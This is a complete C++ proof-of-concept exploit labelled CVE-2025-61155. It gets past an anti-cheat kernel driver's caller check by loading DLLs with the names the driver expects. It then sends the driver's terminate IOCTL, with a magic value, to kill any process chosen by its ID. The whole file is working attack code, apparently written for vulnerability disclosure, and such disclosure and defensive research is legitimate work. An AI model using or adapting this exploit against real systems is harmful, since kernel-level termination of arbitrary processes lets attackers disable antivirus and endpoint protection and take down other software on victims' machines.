#include <windows.h>
#include <tlhelp32.h>
#include <iostream>

#define IOCTL_TERMINATE_PROCESS 0x222040
#define MAGIC_VALUE 0xfa123456
#define TARGET_PROCESS "notepad.exe"

struct terminate_struct {
    DWORD magic;
    DWORD processId;
};

DWORD get_pid(const char* name) {
    PROCESSENTRY32 pe{ sizeof(pe) };
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) return 0;
    for (BOOL ok = Process32First(snap, &pe); ok; ok = Process32Next(snap, &pe))
        if (strcmp(pe.szExeFile, name) == 0) { CloseHandle(snap); return pe.th32ProcessID; }
    CloseHandle(snap);
    return 0;
}

int main() {

    //Having these DLLs loaded is part of a driver verification process, it can be any DLL, it just needs to have that name.
    LoadLibraryA("QmGUI.dll");
    LoadLibraryA("QmGUI4.dll");
    LoadLibraryA("gameuirender.dll");

    printf("CVE-2025-61155 POC\n");

    DWORD pid = get_pid(TARGET_PROCESS);
    if (!pid) {
        printf("[-] process not found\n");
        return 1;
    }

    HANDLE h = CreateFileA("\\\\.\\HtAntiCheatDriver", GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);

    if (h == INVALID_HANDLE_VALUE) {
        printf("[-] failed to open device\n");
        return 1;
    }

    terminate_struct data{ MAGIC_VALUE, pid };
    DWORD bytes = 0;

    if (DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &data, sizeof(data), nullptr, 0, &bytes, nullptr)) {
        printf("[+] process terminated with pid: %lu\n", pid);
    }
    else {
        printf("[-] failed to send command\n");
    }


    CloseHandle(h);
    return 0;
}
